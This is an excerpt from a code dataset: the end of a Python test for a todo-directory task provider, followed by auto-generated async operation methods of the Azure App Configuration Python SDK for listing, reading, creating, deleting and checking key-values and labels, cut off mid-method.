from ..provider import todo_dir
from .. import _base
class TestTodoDir(unittest.fs.TestCase):
MODULES = [todo_dir]
def setUp(self):
if _base.task_provider._entries.get('todo_dir'): # pragma: no cover
del _base.task_provider._entries['todo_dir']
super(TestTodoDir, self).setUp()
def tearDown(self):
if _base.task_provider._entries.get('todo_dir'): # pragma: no cover
del _base.task_provider._entries['todo_dir']
@unittest.mock.patch('clckwrkbdgr.todo._base.read_config', new=_base.read_config.__wrapped__)
def should_list_todo_dir(self):
self.fs.create_file(str(xdg.save_data_path('todo')/'config.json'), contents=json.dumps({
"inbox_file" : str(xdg.save_data_path('todo')/"inbox.txt"),
"todo_dir" : str(xdg.save_data_path('todo')),
}))
self.fs.create_dir(str(xdg.save_data_path('todo')/'foo'))
self.fs.create_file(str(xdg.save_data_path('todo')/'bar.md'))
self.fs.create_file(str(xdg.save_data_path('todo')/'inbox.txt'))
self.assertEqual(set(todo_dir.list_todo_directory()), {
_base.Task('foo', tags=['foo']),
_base.Task('bar.md', tags=['bar']),
})
| [
"[email protected]"
] | |
5a8758c70f2c16039e050e3cd7e77ed3736f27e3 | 0a2cc497665f2a14460577f129405f6e4f793791 | /sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/aio/operations/_azure_app_configuration_operations.py | d898efd4c7a3d1b42d4ce643dcad171b78bb582f | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | hivyas/azure-sdk-for-python | 112158aa9e1dd6e30cf6b3dde19f5db6ea2a577b | 8b3258fa45f5dc25236c22ad950e48aa4e1c181c | refs/heads/master | 2023-06-17T12:01:26.392186 | 2021-05-18T19:56:01 | 2021-05-18T19:56:01 | 313,761,277 | 1 | 1 | MIT | 2020-12-02T17:48:22 | 2020-11-17T22:42:00 | Python | UTF-8 | Python | false | false | 59,148 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AzureAppConfigurationOperationsMixin:
def get_keys(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
**kwargs
) -> AsyncIterable["_models.KeyListResult"]:
"""Gets a list of keys.
Gets a list of keys.
:param name: A filter for the name of the returned keys.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.keyset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_keys.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_keys.metadata = {'url': '/keys'} # type: ignore
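
    # Hedged usage sketch for get_keys (not part of the generated client; the
    # client variable and filter value are placeholders, and attribute names
    # follow the generated models). AsyncItemPaged is consumed with `async for`:
    #
    #     async for key in client.get_keys(name="app*"):
    #         print(key.name)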
async def check_keys(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param name: A filter for the name of the returned keys.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_keys.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_keys.metadata = {'url': '/keys'} # type: ignore
def get_key_values(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Get6ItemsItem"]]] = None,
**kwargs
) -> AsyncIterable["_models.KeyValueListResult"]:
"""Gets a list of key-values.
Gets a list of key-values.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Get6ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyValueListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.KeyValueListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValueListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kvset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_key_values.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyValueListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_key_values.metadata = {'url': '/kv'} # type: ignore
async def check_key_values(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Head6ItemsItem"]]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Head6ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_key_values.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_key_values.metadata = {'url': '/kv'} # type: ignore
async def get_key_value(
self,
key: str,
label: Optional[str] = None,
accept_datetime: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
select: Optional[List[Union[str, "_models.Get7ItemsItem"]]] = None,
**kwargs
) -> "_models.KeyValue":
"""Gets a single key-value.
Gets a single key-value.
:param key: The key of the key-value to retrieve.
:type key: str
:param label: The label of the key-value to retrieve.
:type label: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Get7ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.get_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('str', response.headers.get('Last-Modified'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
async def put_key_value(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
entity: Optional["_models.KeyValue"] = None,
**kwargs
) -> "_models.KeyValue":
"""Creates a key-value.
Creates a key-value.
:param key: The key of the key-value to create.
:type key: str
:param label: The label of the key-value to create.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:param entity: The key-value to create.
:type entity: ~azure.appconfiguration.models.KeyValue
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
content_type = kwargs.pop("content_type", "application/vnd.microsoft.appconfig.kv+json")
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.put_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if entity is not None:
body_content = self._serialize.body(entity, 'KeyValue')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
put_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
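
    # Hedged usage sketch for put_key_value (not part of the generated client;
    # assumes a KeyValue model from `_models`, and all values are placeholders):
    #
    #     entity = _models.KeyValue(key="color", value="blue")
    #     kv = await client.put_key_value("color", entity=entity)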
async def delete_key_value(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
**kwargs
) -> Optional["_models.KeyValue"]:
"""Deletes a key-value.
Deletes a key-value.
:param key: The key of the key-value to delete.
:type key: str
:param label: The label of the key-value to delete.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.KeyValue"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.delete_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
deserialized = None
if response.status_code == 200:
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if response.status_code == 204:
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
delete_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
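
    # --- Hedged usage sketch (added) ---
    # Per the status handling above, delete_key_value returns the deleted
    # KeyValue on 200 and None on 204 (nothing matched); names illustrative.
    #
    #     deleted = await client.delete_key_value("color", label="prod")
    #     if deleted is None:
    #         print("key-value did not exist")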
async def check_key_value(
self,
key: str,
label: Optional[str] = None,
accept_datetime: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
select: Optional[List[Union[str, "_models.Head7ItemsItem"]]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param key: The key of the key-value to retrieve.
:type key: str
:param label: The label of the key-value to retrieve.
:type label: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Head7ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('str', response.headers.get('Last-Modified'))
if cls:
return cls(pipeline_response, None, response_headers)
check_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
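
    # --- Hedged usage sketch (added) ---
    # check_key_value issues a HEAD request, so only headers come back; the
    # `cls` hook (called as cls(response, None, headers) above) can capture them.
    #
    #     headers = await client.check_key_value(
    #         "color", cls=lambda resp, _, hdrs: hdrs)
    #     print(headers.get("ETag"))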
def get_labels(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["_models.LabelListResult"]:
"""Gets a list of labels.
Gets a list of labels.
:param name: A filter for the name of the returned labels.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LabelListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.LabelListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LabelListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.labelset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_labels.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('LabelListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_labels.metadata = {'url': '/labels'} # type: ignore
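
    # --- Hedged usage sketch (added) ---
    # get_labels returns an AsyncItemPaged that follows next_link pages
    # transparently; iterate with `async for`. The name filter is illustrative.
    #
    #     async for label in client.get_labels(name="prod*"):
    #         print(label.name)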
async def check_labels(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[str]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param name: A filter for the name of the returned labels.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_labels.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
